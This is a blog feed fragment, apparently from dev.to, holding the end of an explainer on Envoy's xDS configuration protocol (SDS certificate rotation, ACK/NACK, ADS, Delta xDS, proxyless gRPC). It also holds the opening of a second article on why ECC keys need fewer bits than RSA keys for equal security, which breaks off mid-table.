        &lt;span class="na"&gt;socket_address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="nv"&gt;10.0.1.15&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;port_value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="nv"&gt;8080&lt;/span&gt; &lt;span class="pi"&gt;}&lt;/span&gt;  &lt;span class="c1"&gt;# ← Actual IP&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;endpoint&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;socket_address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="nv"&gt;10.0.1.22&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;port_value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="nv"&gt;8080&lt;/span&gt; &lt;span class="pi"&gt;}&lt;/span&gt;  &lt;span class="c1"&gt;# ← Actual IP&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  ⑤ Encrypting via SDS (mTLS) and Zero-Downtime Rotation
&lt;/h3&gt;

&lt;p&gt;Once the destination IP is pinned down, we don't just blindly fire the packet. In modern service meshes, mTLS (mutual TLS) encryption between Pods is mandatory. This is where &lt;strong&gt;SDS (Secret Discovery Service)&lt;/strong&gt; steps onto the stage.&lt;/p&gt;

&lt;p&gt;Inside the CDS definition, it dictates "use this specific TLS context when talking to this cluster." Envoy then uses SDS to dynamically fetch the certificate (SVID) and private key straight into memory.&lt;br&gt;
What's spectacular here is &lt;strong&gt;certificate rotation&lt;/strong&gt;. Before a certificate expires, you historically had to restart the web server process. With SDS, the microsecond a new certificate is issued, it is flashed into memory via xDS, enabling &lt;strong&gt;100% zero-downtime, automated certificate rotation&lt;/strong&gt;. Because this is highly sensitive secret data, this specific stream is strictly gated and protected.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Conceptual data streamed from SDS (Secret Discovery Service)&lt;/span&gt;
&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;tls_certificate&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;certificate_chain&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;inline_string&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;-----BEGIN&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;CERTIFICATE-----&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;..."&lt;/span&gt; &lt;span class="pi"&gt;}&lt;/span&gt;
  &lt;span class="na"&gt;private_key&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;inline_string&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;-----BEGIN&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;PRIVATE&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;KEY-----&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;..."&lt;/span&gt; &lt;span class="pi"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In short, a packet perfectly traces the configuration pointers in the exact order of &lt;strong&gt;LDS → RDS → CDS → EDS (+ SDS)&lt;/strong&gt;, encrypts itself, secures routing, and takes flight.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb8u3r89nb81anmrsie92.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb8u3r89nb81anmrsie92.png" alt="xds flow" width="769" height="1052"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;You must never forget this "dependency order." It is the exact reason why ADS (Aggregated Discovery Service), which we'll discuss later, exists.&lt;/p&gt;




&lt;h2&gt;
  
  
  3. Surviving Broken Configs: The ACK/NACK Flow
&lt;/h2&gt;

&lt;p&gt;In an architecture where dynamic configs are blasted out to thousands of proxies, pushing a "bad config" causes apocalyptic damage. What happens if the control plane sends a malformed JSON or a conflicting route setting?&lt;/p&gt;

&lt;p&gt;Does Envoy bug out and crash? ...Absolutely not.&lt;br&gt;
xDS is armed with a fiercely robust rollback mechanism called &lt;strong&gt;"NACK" (Negative Acknowledgement)&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;xDS communication is a bidirectional gRPC stream. When a &lt;code&gt;DiscoveryResponse&lt;/code&gt; arrives from the control plane, Envoy attempts to apply it. It then packages the result into a &lt;code&gt;DiscoveryRequest&lt;/code&gt; and shoots it back to the control plane.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4ij53peb0yp9jijbu5pq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4ij53peb0yp9jijbu5pq.png" alt="nack" width="800" height="442"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The absolute beauty of this design is that &lt;strong&gt;even if a NACK occurs, Envoy's stream does NOT sever; it just keeps humming along using the last-known-good config (v1)&lt;/strong&gt;.&lt;br&gt;
Even if an operator brutally applies a flawed &lt;code&gt;VirtualService&lt;/code&gt; to Kubernetes, Envoy essentially says "screw this," returns a NACK, and existing traffic doesn't drop a single millisecond. It simply waits idly for a corrected config to be pushed.&lt;/p&gt;

&lt;p&gt;Two control fields are the key players here: &lt;code&gt;nonce&lt;/code&gt; and &lt;code&gt;version_info&lt;/code&gt;.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;nonce&lt;/code&gt;&lt;/strong&gt;: A simple ID that says, "Hey, which specific update payload are you giving me the validation result for?"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;version_info&lt;/code&gt;&lt;/strong&gt;: The factual state that says, "As a result, what version of the config am I currently running?"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If Envoy simply parrots back the latest &lt;code&gt;version_info&lt;/code&gt; the server sent, it's categorized as an "ACK (Success)." If it returns an older version number, the server realizes it's a "NACK (Failure)." It’s brilliantly simple, yet ruthlessly effective.&lt;/p&gt;




&lt;h2&gt;
  
  
  4. Why We Need ADS (Aggregated Discovery Service)
&lt;/h2&gt;

&lt;p&gt;Earlier, I mentioned that LDS → RDS → CDS → EDS share a strict dependency chain.&lt;/p&gt;

&lt;p&gt;What would happen if you subscribed to these four APIs via &lt;strong&gt;completely separate gRPC streams&lt;/strong&gt; asynchronously from the control plane? Naturally, due to network latency or processing timing, their arrival order would scramble.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Imagine the worst-case scenario.&lt;/strong&gt;&lt;br&gt;
A new RDS (route setting) arrives first. It says, "route traffic to &lt;code&gt;cluster-B&lt;/code&gt;". Envoy eagerly updates its settings and tries to shove traffic towards &lt;code&gt;cluster-B&lt;/code&gt;. However, the streams for CDS and EDS (the actual definition and IPs of &lt;code&gt;cluster-B&lt;/code&gt;) are lagging slightly behind and haven't hit Envoy yet.&lt;/p&gt;

&lt;p&gt;As a result, Envoy concludes "the destination cluster doesn't exist" and &lt;strong&gt;starts aggressively throwing 503 Service Unavailable errors&lt;/strong&gt;. A service mesh where 503s run rampant every time a configuration changes is completely unusable.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Fix: Bundling the Streams (ADS)
&lt;/h3&gt;

&lt;p&gt;To prevent this "temporary inconsistency in an eventually consistent system," &lt;strong&gt;ADS (Aggregated Discovery Service)&lt;/strong&gt; was forged.&lt;/p&gt;

&lt;p&gt;ADS multiplexes (aggregates) the requests and responses for ALL xDS resource types (LDS/RDS/CDS/EDS) into &lt;strong&gt;a single solitary gRPC stream&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6futt305amjz11r46ylo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6futt305amjz11r46ylo.png" alt="ads" width="800" height="518"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;By bundling everything into one stream, the control plane gains the ability to enforce perfect Sequencing: &lt;strong&gt;"I will force Envoy to apply CDS/EDS first, and I won't send RDS until I get the ACKs back."&lt;/strong&gt;&lt;br&gt;
Istio's control plane (&lt;code&gt;istiod&lt;/code&gt;) uses this ADS approach by default to stream configurations safely.&lt;/p&gt;




&lt;h2&gt;
  
  
  5. SotW vs Delta: Taming the Infinite Endpoint Explosion
&lt;/h2&gt;

&lt;p&gt;Looking back at the history of xDS brings us to another massive evolutionary fork: &lt;em&gt;how&lt;/em&gt; the configs are sent.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Limits of State of the World (SotW)
&lt;/h3&gt;

&lt;p&gt;Early xDS utilized a model called &lt;strong&gt;SotW (State of the World)&lt;/strong&gt;. When Envoy asks "Tell me the current endpoints," the server responds by sending back &lt;strong&gt;"the entire, exhaustive list of endpoints"&lt;/strong&gt; every single time.&lt;/p&gt;

&lt;p&gt;Let's assume you have a cluster of 1,000 Pods, and a single Pod scales out, making it 1,001.&lt;br&gt;
In the SotW model, &lt;code&gt;istiod&lt;/code&gt; beams out the &lt;strong&gt;full list of 1,001 IP addresses&lt;/strong&gt; to every single Envoy proxy. The 1,000 unmodified records are re-transmitted entirely. This is a colossal waste of network bandwidth and CPU horsepower. Once your cluster scales large enough, the control plane literally chokes and dies.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Dawn of Incremental (Delta) xDS
&lt;/h3&gt;

&lt;p&gt;This crisis birthed &lt;strong&gt;Delta xDS&lt;/strong&gt;.&lt;br&gt;
When returning subscription requests, the server now sends &lt;strong&gt;"only the diff from the last state (added IPs, removed IPs)."&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;SotW: &lt;code&gt;[IP_A, IP_B, IP_C]&lt;/code&gt; (If B is deleted, it resends &lt;code&gt;[IP_A, IP_C]&lt;/code&gt;. Items missing from the list are implicitly assumed deleted.)&lt;/li&gt;
&lt;li&gt;Delta: &lt;code&gt;removed_resources: ["IP_B"]&lt;/code&gt; (Explicitly sends ONLY the deletion directive.)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Because the server must maintain an in-memory cache tracking the individual state of every single client, the backend implementation becomes drastically more complex. However, the performance gains are monumental. Modern service meshes circa 2026 (like recent versions of Istio) securely default to Delta xDS.&lt;/p&gt;




&lt;h2&gt;
  
  
  6. Beyond Routing: Advanced xDS Use Cases
&lt;/h2&gt;

&lt;p&gt;When discussing xDS, it's impossible to ignore the fact that &lt;strong&gt;xDS is no longer an "Envoy-exclusive routing protocol."&lt;/strong&gt; As of 2026, the xDS ecosystem has wildly expanded beyond basic routing and breached into non-Envoy clients.&lt;/p&gt;

&lt;h3&gt;
  
  
  6.1 Dynamic Injection of Extensions (ECDS)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;ECDS (Extension Config Discovery Service)&lt;/strong&gt; is a mechanism to dynamically push "extension filters" (like WebAssembly) directly into Envoy.&lt;br&gt;
For example, you write a proprietary Wasm module that applies custom obfuscation to a specific HTTP header, and you stream it via ECDS. This lets you &lt;strong&gt;hot-reload and inject brand-new Wasm modules into every proxy safely, while they are running&lt;/strong&gt;, without touching LDS or RDS at all.&lt;/p&gt;

&lt;h3&gt;
  
  
  6.2 Streaming Runtime Variables (RTDS)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;RTDS (Runtime Discovery Service)&lt;/strong&gt; skips routing altogether and instead streams "runtime variables" (think of it as a virtual file system).&lt;br&gt;
Need to flip a new feature ON/OFF (feature toggles) or temporarily throttle a specific user's rate limits? You use RTDS. It instantly propagates single variable tweaks to thousands of proxies without forcing an application rebuild or redeploy.&lt;/p&gt;

&lt;h3&gt;
  
  
  6.3 Building Proprietary Control Planes (&lt;code&gt;go-control-plane&lt;/code&gt;) &amp;amp; Case Studies
&lt;/h3&gt;

&lt;p&gt;Because the xDS specs are fully open (defined in Protobuf), it's highly common for massive-scale environments to ditch off-the-shelf products like Istio and &lt;strong&gt;build their very own bespoke xDS control planes&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Libraries provided by the Envoy project, like &lt;code&gt;go-control-plane&lt;/code&gt;, shoulder the agonizing implementation burdens of operating an xDS gRPC server (handling streams, snapshot caching, etc.). By wiring this up, companies can construct proprietary control planes that use "internal corporate databases" as the Source of Truth, governed by heavily customized business logic.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Tech Giant Case Studies:&lt;/strong&gt;&lt;br&gt;
For companies wrestling with horribly complex "brownfield" infrastructure, these custom control planes are a lifeline.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Stripe&lt;/strong&gt;: They operate an internal service mesh using HashiCorp Consul as the Source of Truth for service discovery. They built a custom control plane that snags data from Consul, compiles it into xDS parameters, and streams it to Envoy.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Netflix&lt;/strong&gt;: To manage their astronomical fleet of microservices, Netflix built a custom foundation fused with Eureka (their service registry). By aggressively utilizing &lt;code&gt;On-Demand Cluster Discovery (ODCDS)&lt;/code&gt;, they dynamically inject &lt;em&gt;only&lt;/em&gt; the settings Envoy actually needs, shattering the scaling boundaries of giant clusters.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Airbnb / Uber&lt;/strong&gt;: They bake custom logic into their bespoke control planes to rein in legacy, non-containerized workloads that refuse to submit to Kubernetes, and to shove highly specialized, company-specific L7 routing logic straight into the proxy tier.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The meta isn't just "deploy Istio and call it a day." It’s "translate your company's proprietary domain logic into xDS, the universal language, and stream it." That is the absolute frontline of the service mesh today.&lt;/p&gt;

&lt;h3&gt;
  
  
  6.4 The "Proxyless gRPC" Paradigm
&lt;/h3&gt;

&lt;p&gt;The ultimate evolution of this is &lt;strong&gt;Proxyless gRPC&lt;/strong&gt;.&lt;br&gt;
Instead of deploying an Envoy (sidecar) next to your application, &lt;strong&gt;the gRPC library itself seamlessly acts as an xDS client&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd9b8vdm7x1jl9e8shtpx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd9b8vdm7x1jl9e8shtpx.png" alt="Proxyless gRPC" width="621" height="589"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;By generating a gRPC channel using the unique &lt;code&gt;xds:///my-service&lt;/code&gt; URI scheme, the gRPC library quietly connects to the control plane (like &lt;code&gt;istiod&lt;/code&gt;) under the hood, pulls down EDS configs, and blasts direct HTTP/2 requests right to the optimal Pod from &lt;em&gt;within your own application process&lt;/em&gt;.&lt;br&gt;
Because you bypass the sidecar entirely, you prune network hops, slashing latency and devouring far less CPU. &lt;em&gt;This&lt;/em&gt; is the true essence of xDS earning the title "Universal Data Plane API".&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Behind the wizardry of an infrastructure that magically swaps over seconds after you smash &lt;code&gt;kubectl apply&lt;/code&gt;, lies this heavily gritty, battle-tested mechanism.&lt;/p&gt;

&lt;p&gt;The rigid hierarchy of LDS/RDS/CDS/EDS enforcing dependencies.&lt;br&gt;
The indestructible ACK/NACK flow shielding the system from crippled configurations.&lt;br&gt;
The sequencing and stream multiplexing of ADS preventing nasty 503 hiccups.&lt;br&gt;
And the adoption of Delta xDS breaking the chains of scalability limits.&lt;/p&gt;

&lt;p&gt;It is precisely because these gears mesh in such miraculous balance that we get to casually enjoy things like "zero downtime traffic shifting" and "canary releases."&lt;br&gt;
xDS is no longer just Envoy's internal protocol. It is the absolute, most vital "nervous system" anchoring modern, cloud-native network architecture.&lt;/p&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.envoyproxy.io/docs/envoy/latest/api-docs/xds_protocol" rel="noopener noreferrer"&gt;Envoy xDS REST and gRPC Protocol (Official Documentation)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.envoyproxy.io/docs/envoy/latest/api/api" rel="noopener noreferrer"&gt;xDS API Overview - Envoy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/cncf/xds" rel="noopener noreferrer"&gt;CNCF xDS API Repository&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://grpc.io/docs/guides/xds/" rel="noopener noreferrer"&gt;gRPC Proxyless Service Mesh&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>envoy</category>
      <category>servicemesh</category>
      <category>kubernetes</category>
      <category>istio</category>
    </item>
    <item>
      <title>Why Can We Use "Shorter" Keys?: Key Length vs Security Bits, the Real Story</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Sun, 19 Apr 2026 15:50:50 +0000</pubDate>
      <link>https://dev.to/kanywst/why-can-we-use-shorter-keys-key-length-vs-security-bits-the-real-story-1gl3</link>
      <guid>https://dev.to/kanywst/why-can-we-use-shorter-keys-key-length-vs-security-bits-the-real-story-1gl3</guid>
      <description>&lt;p&gt;"ECDSA P-256 has shorter keys than RSA-2048. So it must be weaker."&lt;/p&gt;

&lt;p&gt;...I used to think that too.&lt;/p&gt;

&lt;p&gt;2048 bits vs 256 bits. Just looking at the numbers, RSA seems 8x "stronger." But NIST (the National Institute of Standards and Technology) treats these two as &lt;strong&gt;equal in security strength&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;On top of that, RSA-2048's actual security does not even reach "128-bit security." It sits at &lt;strong&gt;112 bits&lt;/strong&gt;, and it is getting deprecated in 2030. Meanwhile, P-256 properly achieves 128-bit security.&lt;/p&gt;

&lt;p&gt;So &lt;strong&gt;the shorter key is actually stronger&lt;/strong&gt;. The concept behind this counterintuitive fact is called "security bits."&lt;/p&gt;

&lt;p&gt;This article covers why "key length" and "actual security" do not match up, from the mathematical foundations all the way to the 2026 transition timeline.&lt;/p&gt;




&lt;h2&gt;
  
  
  1. Background: Symmetric vs Public Key Cryptography
&lt;/h2&gt;

&lt;p&gt;There are two fundamental types of cryptography. Without understanding this distinction, key length discussions will never make sense.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Symmetric Key Cryptography&lt;/strong&gt;: Uses &lt;strong&gt;the same key&lt;/strong&gt; for both encryption and decryption. The canonical example is &lt;strong&gt;AES&lt;/strong&gt; (Advanced Encryption Standard). Both sender and receiver need to share the same key. It is fast, and it is what actually encrypts your data. WiFi (WPA2/3) and disk encryption (BitLocker, FileVault) all use this.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Public Key Cryptography&lt;/strong&gt;: Uses &lt;strong&gt;a pair of different keys&lt;/strong&gt; for encryption and decryption. The main examples are &lt;strong&gt;RSA&lt;/strong&gt; and &lt;strong&gt;ECC&lt;/strong&gt; (Elliptic Curve Cryptography). You can hand out the public key to anyone, but only the corresponding private key can decrypt. Key distribution is easy, so it is used for TLS (HTTPS) key exchange and digital signatures. The downside is that it is computationally expensive.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvj4tabmdpqzkoh8j5x6f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvj4tabmdpqzkoh8j5x6f.png" alt="key" width="800" height="257"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In practice, HTTPS combines both. Public key crypto handles "securely exchanging a key," then symmetric crypto handles "encrypting data fast."&lt;/p&gt;

&lt;p&gt;Now here is the thing. &lt;strong&gt;These two types of cryptography require completely different key lengths.&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  2. "Key Length" and "Security Bits" Are Different Things
&lt;/h2&gt;

&lt;p&gt;Let me clarify the terminology.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Key Length&lt;/strong&gt;: The number of bits in the key data that the algorithm uses. RSA-2048 uses 2048 bits, AES-128 uses 128 bits.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Security Bits (Security Strength)&lt;/strong&gt;: The computational effort required to break the cipher, expressed as a power of 2.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;"128-bit security" means that even the best known attack requires roughly $2^{128}$ operations. $2^{128}$ is about 3.4 x $10^{38}$. Even if you threw every supercomputer on Earth at it, you could repeat the entire age of the universe (about 13.8 billion years) trillions of times over and still not finish. It is basically the threshold for "cannot be broken in practice."&lt;/p&gt;

&lt;p&gt;Here is the biggest source of confusion: &lt;strong&gt;key length ≠ security bits&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;AES-128 has 128-bit security. Key length and security bits happen to match.&lt;br&gt;
But RSA-2048 only has 112-bit security. Despite having a 2048-bit key, its effective strength is only 112 bits.&lt;/p&gt;

&lt;p&gt;Why does this happen?&lt;/p&gt;


&lt;h2&gt;
  
  
  3. Each Cipher Has Different Attack "Shortcuts"
&lt;/h2&gt;

&lt;p&gt;Breaking a cipher is not just about trying every possible key (brute force). Some algorithms have much more efficient attack methods. The existence and efficiency of these "shortcuts" determine the key length each algorithm needs.&lt;/p&gt;
&lt;h3&gt;
  
  
  AES: No shortcuts, so key length = security bits
&lt;/h3&gt;

&lt;p&gt;The best known attack against AES is essentially brute force. For AES-128, you need to try all $2^{128}$ possible keys. That is why key length directly equals security bits.&lt;/p&gt;
&lt;h3&gt;
  
  
  RSA: Integer factorization is a powerful shortcut
&lt;/h3&gt;

&lt;p&gt;RSA's security relies on the assumption that "factoring a huge number $N$ is hard."&lt;/p&gt;

&lt;p&gt;$N$ is the product of two large primes $p$ and $q$ ($N = p \times q$). If you can find $p$ and $q$, you can compute the private key, but if $N$ is large enough, factoring should take an impractical amount of time... or so the idea goes.&lt;/p&gt;

&lt;p&gt;The problem is that there exists an efficient algorithm for integer factorization called the &lt;strong&gt;General Number Field Sieve (GNFS)&lt;/strong&gt;. Thanks to GNFS, the effort to break RSA-2048 drops from $2^{2048}$ (brute force) down to roughly $2^{112}$.&lt;/p&gt;

&lt;p&gt;Think of it this way. If you tried every combination on a 2048-digit safe one by one, it would take an astronomical amount of time. But GNFS is like "analyzing the safe's internal structure to dramatically narrow down the combinations." The key is 2048 bits, but the effective defense is only 112 bits.&lt;/p&gt;
&lt;h3&gt;
  
  
  ECC: Has shortcuts, but they are far less efficient than RSA's
&lt;/h3&gt;

&lt;p&gt;ECC (Elliptic Curve Cryptography) relies on the "Elliptic Curve Discrete Logarithm Problem (ECDLP)."&lt;/p&gt;

&lt;p&gt;I will skip the detailed math, but the key point is this: the best attack against ECC (Pollard's rho) requires computation proportional to &lt;strong&gt;half the key length&lt;/strong&gt;. For P-256 (256-bit key), that means $2^{128}$ operations, which gives you 128-bit security.&lt;/p&gt;

&lt;p&gt;Digging a bit deeper, this difference comes from a &lt;strong&gt;gap in computational complexity&lt;/strong&gt;. GNFS runs in &lt;strong&gt;sub-exponential time&lt;/strong&gt;, meaning that even as you make keys longer, the attack cost grows sluggishly. Pollard's rho against ECC, on the other hand, runs in &lt;strong&gt;exponential time&lt;/strong&gt;, specifically $O(\sqrt{N})$. Each extra bit in the key doubles the attack cost.&lt;/p&gt;

&lt;p&gt;In concrete numbers: RSA-2048 goes from 2048 bits to 112-bit security (roughly 1/18), RSA-3072 goes from 3072 bits to 128 bits (roughly 1/24), and RSA-15360 goes from 15360 bits to 256 bits (roughly 1/60). The longer the key, the worse the "decay ratio" gets. This is a direct consequence of GNFS being sub-exponential: the growth in attack cost cannot keep up with the cost of making keys longer. ECC stays at 1/2 regardless. This mathematical gap is what makes "ECC is secure with short keys" possible.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F17ll5sofprbttek34fhz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F17ll5sofprbttek34fhz.png" alt="ecc vs rsa" width="715" height="355"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;RSA has the longer key but the lower security bits. That is how big the difference in attack efficiency is.&lt;/p&gt;


&lt;h2&gt;
  
  
  4. Equivalent Security Key Lengths (NIST SP 800-57)
&lt;/h2&gt;

&lt;p&gt;So how do these differences in attack efficiency translate to actual key lengths? NIST SP 800-57 Part 1 defines a security strength equivalence table, and it is the industry standard as of 2026.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Security&lt;br&gt;Bits&lt;/th&gt;
&lt;th&gt;Symmetric&lt;br&gt;(AES)&lt;/th&gt;
&lt;th&gt;RSA&lt;br&gt;(Key)&lt;/th&gt;
&lt;th&gt;ECC&lt;br&gt;(Key)&lt;/th&gt;
&lt;th&gt;Hash&lt;br&gt;(SHA)&lt;/th&gt;
&lt;th&gt;Status&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;80&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;-&lt;/td&gt;
&lt;td&gt;1024&lt;/td&gt;
&lt;td&gt;160&lt;/td&gt;
&lt;td&gt;SHA-1&lt;/td&gt;
&lt;td&gt;❌ Prohibited&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;112&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;-&lt;/td&gt;
&lt;td&gt;2048&lt;/td&gt;
&lt;td&gt;224&lt;/td&gt;
&lt;td&gt;SHA-224&lt;/td&gt;
&lt;td&gt;⚠️ Deprecated by 2030&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;128&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AES-128&lt;/td&gt;
&lt;td&gt;3072&lt;/td&gt;
&lt;td&gt;256&lt;/td&gt;
&lt;td&gt;SHA-256&lt;/td&gt;
&lt;td&gt;✅ Current minimum&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;192&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AES-192&lt;/td&gt;
&lt;td&gt;7680&lt;/td&gt;
&lt;td&gt;384&lt;/td&gt;
&lt;td&gt;SHA-384&lt;/td&gt;
&lt;td&gt;✅ Recommended&lt;/td&gt;
&lt;/tr&gt;
